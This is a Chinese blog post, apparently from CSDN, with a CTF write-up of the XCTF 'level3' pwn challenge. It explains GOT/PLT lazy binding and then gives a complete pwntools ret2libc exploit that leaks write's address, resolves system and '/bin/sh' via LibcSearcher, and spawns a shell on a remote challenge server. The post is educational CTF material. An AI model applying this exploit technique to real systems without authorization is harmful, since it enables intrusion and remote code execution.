浅谈rop-ret2libc原理以及解答-以攻防世界level3为例

最新推荐文章于 2024-04-07 19:07:29 发布
最新推荐文章于 2024-04-07 19:07:29 发布
阅读量538 收藏 6
点赞数 1
分类专栏: pwn ROP 文章标签: pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pointerr/article/details/119416781
版权
pwn 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
ROP
3 篇文章 0 订阅
订阅专栏

栈溢出-rop-libc

0x01、got表和plt表与动态链接、绑定延迟(重点理解)
GOT概述

1、当在程序中引用某个共享库中的符号时,编译链接阶段并不知道这个符号的具体位置,只有等到动态链接器将所需要的共享库加载进内存后,也就是在运行阶段,符号的地址才会最终确定。因此,需要有一个数据结构来保存符号的绝对地址,这就是GOT表的作用,GOT表中每项保存程序中引用其他符号的绝对地址。这样,程序就可以通过引用GOT表来获得某个符号的地址
2、在X86结构中,GOT表的前三项保留,用于保存特殊的数据结构地址,其他的各项保存符号的绝对地址
3、对于符号的动态解析过程,我们只需要了解的就是第2项、第3项,即GOT[1]、GOT[2]
4、GOT[1]保存的是一个地址,指向已经加载的共享库的链表地址
5、GOT[2]保存的是一个函数的地址,定义如下:GOT[2]=&_dl_runtime_resolve,这个函数的主要作用就是找到某个符号的地址,并把它写到与此符号相关的GOT项中,然后就是将控制转移到目标函数中

PLT表概述

PLT表通过引用GOT表中的函数的绝对地址,来把控制转移到实际的函数
在实际的可执行程序或者共享目标文件中,GOT表在名称为.got.plt的section中,PLT表在名称为.plt的section中

第一次函数调用:
图片参考连接链接(不懂的也可以去看这个博主的视频,):
https://space.bilibili.com/24337218?from=search&seid=6758970907964287136在这里插入图片描述第二次函数调用:
在这里插入图片描述
更多关于libc知识可以看另一篇文章:
https://blog.csdn.net/pointerr/article/details/111349927?spm=1001.2014.3001.5501

0x02、例题:攻防世界-level3:

老rop了
在这里插入图片描述

plt表没有system函数,没有/bin/sh字符串(shift+f12)。
在这里插入图片描述
在这里插入图片描述

思路:
题目给出了vulerable_function(),其中有read()栈溢出,而libc版本的查找和得到shell需要两步进行,所以应该重复利用vulerable_function(),大致的pwn思路如下:

1.通过vulerable_function()的read()构造ROP得到PLT表中write()的位置
2.通过write()得到write()在程序中的真实地址
3.使用LibcSearcher得到libc版本(LibcSearcher可以参考https://github.com/lieanu/LibcSearcher)
4.在对应的libc版本中查找write()、system()、/bin/sh的真实地址
5.使用write()的程序地址和libc地址计算出偏移量
6.在system()、/bin/sh的真实地址上加上偏移量再通过vulerable_function()执行getshell

求偏移量,得出偏移量为140。
在这里插入图片描述

求write函数的真实地址:
在这里插入图片描述

在这里插入图片描述

write_plt:0x8048340
write_got:0x804a018
write_addr:0xf76a63c0

知道了write的偏移量,就能求出libc地址与该程序地址的总体偏移量:

offer=write_addr-write_offer

通过该偏移量,就能求出system函数,bin_sh字符串的真实地址加上总的偏移量。从而编写payload2:

payload2='A'*0x88 + 'A'*0x4+p32(system_addr)+p32(exit_addr)+p32(bin_sh_addr)

这里为什么要加上exit的地址,查询资料得知:

linux x86函数执行的时候,再刚刚进入system函数的时候,会默认push一个返回地址,然后才是system的参数,所以如果我们想得到一个shell的话,system地址中间需要随便加一个以作为间隔

再次利用vuln函数漏洞,就能getshell。
0x03、exp:

#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
p=remote("111.200.241.244",54643)
 
elf =ELF("./level3")
write_got=elf.got["write"]
write_plt=elf.plt["write"]
vuln_addr=elf.symbols["vulnerable_function"]
p.recv()
 
payload1='A'*0x88 + 'A'*0x4 +p32(write_plt)+p32(vuln_addr)+p32(0x1)+p32(write_got)
p.send(payload1)
write_addr = u32(p.recv(4))
print("write_plt:"+hex(write_plt))
print("write_got:"+hex(write_got))
print("write_addr:"+hex(write_addr))
 
libc=LibcSearcher("write",write_addr)
write_offer=libc.dump("write")
bin_sh_offer=libc.dump("str_bin_sh")
system_offer=libc.dump("system")
exit_offer=libc.dump("exit")
 
 
offer=write_addr-write_offer
print("offer:"+hex(offer))
system_addr=system_offer+offer
bin_sh_addr=bin_sh_offer+offer
exit_addr=exit_offer+offer
print("system_addr:"+hex(system_addr))
print("bin_sh_addr:"+hex(bin_sh_addr))
print("exit_addr:"+hex(exit_addr))
 
payload2='A'*0x88 + 'A'*0x4+p32(system_addr)+p32(exit_addr)+p32(bin_sh_addr)
p.recv()
p.send(payload2)
p.interactive()

结果:
在这里插入图片描述

p0int3r
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 3120
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实可在CTF wiki上进行下载。
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 786
level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。 这里以leve3为,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
Ret2Libc 攻击技术
guilanl的专栏
03-13 5641
1. DEP 技术对stack overflow 的保护: Data Execution Prevention:  去掉 stack 上的执行权限,可以阻止一部分基于 stack 的攻击。  2. Ret2Libc 攻击原理  Return-to-library technique       简称“Ret2Lib”,这种技术可以绕过DEP的保护,其核心思想是把
ret2libc
2301_79863983的博客
04-07 673
以wiki中的libc的第三道题为,理解libc
ret2libc攻击原理+实分析
yajuanpi4899的博客
11-09 3975
ret2libc攻击方式针对动态链接(Dynamic linking) 编译的程序,静态链接一般利用ROP能简单构造出payload进行攻击(详见ROP博客)。一般情况下无法在程序中直接找到system、execve这一类系统函数,动态链接 ...
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
Performing a ret2libc Attack-InVoLuNTaRy
04-24
### 执行ret2libc攻击——InVoLuNTaRy #### 一、ret2libc攻击简介 **ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式...
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
在本压缩包中,“rop-sample”项目提供了基于ROP的示开发代码,这为我们理解ROP的工作原理及其实际应用提供了宝贵的参考资料。 淘宝作为中国领先的电商平台,其内部系统采用了各种先进的技术和框架以确保高效、...
ROP之ret2alsolve(32位)详解
最新发布
06-18
ROP之ret2alsolve(32位)详解
rop-plus:rop框架修改加强版
06-28
`rop-plus`是一个针对Java平台的ROP框架的增强版本,它为开发者提供了更强大的工具和功能,以进行ROP攻击的研究和防御。框架的主要特点可能包括: 1. **gadget库**:`rop-plus`可能包含了一个庞大的Java gadget库,...
一步一步学ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1167
序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1490
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
level3学习ret2libc
TedLau的博客
04-11 295
0x00 常规文件检查 是一个32位的开启了堆栈不可执行的ELF文件。 0x10 ida打开分析文件 ​ 在左侧的function处并没有发现system函数,但是有一个vulnerable_function, 打开main函数,f5反汇编后可以看到如下图所示的内容,即调用了vulnerable函数 打开vul函数可以发现它使用write函数先输出了一句话,于是我们可以尝试通过泄漏write函数的...
pwn ret2libc
清霂的博客
02-04 418
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
pwn刷题num6--ret2libc
tbsqigongzi的博客
04-21 376
攻防世界pwn新手区level3 下载附件后发现是tar.gz文件, 使用该命令解压 tar -xvf 文件名 解压后保存到的目录 解压后发现给了libclibc是c语言函数库,里面包含各种函数如write,read,system,也有字符串/bin/sh等 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE---
探索LibcSearcher:二进制安全分析利器
gitblog_00033的博客
04-02 492
探索LibcSearcher:二进制安全分析利器 项目地址:https://gitcode.com/dev2ero/LibcSearcher 在软件开发和安全领域,理解库函数的行为至关重要,尤其是C语言中的libcLibcSearcher是一个创新的开源工具,专门设计用于快速搜索和分析各种libc版本的功能实现。这篇文章将带你深入了解该项目的背景、技术细节、应用场景以及其独特优势。 项目简介 L...
[PWN][高级篇]ROP-ret2libc基础知识
网络安全知识分享
03-27 2069
ROP-ret2libc基础知识 前提知识准备Linux延时绑定机制Linux演示绑定机制的实现延迟绑定对我们有什么意义libc函数在哪?ret2libc使用条件如何使用libcplt表和got表的关系整体的跟踪 前提知识准备 Linux延时绑定机制 动态连接的程序调用了libc的库函数,但是libc在运行才被加载到内存中,调用libc函数时,才解析出函数在内存中的地址,为了帮助程序更好的利用内存空间,不用每次把所有的函数真实地址都写进去,用到哪个查哪个,之后在使用就会很方便。 Linux演示绑定机制的实现
c++ 动态库虚表问题导致的不兼容问题 实
kdb_viewer的博客
10-29 586
c++动态库在abi兼容方面臭名昭著,这里结合一个线上模块使用动态库导致出core的问题总结下动态库、虚函数表等知识,这里将线上遇到的问题抽象出一个极简的子,三个文件include.h, main.cpp, func.cpp ,先上源码 include.h: class Base { public: void virtual func1() = 0; }; class Wrapper { public: Base *b; }; extern void jj(Wrapper *);
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2290
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值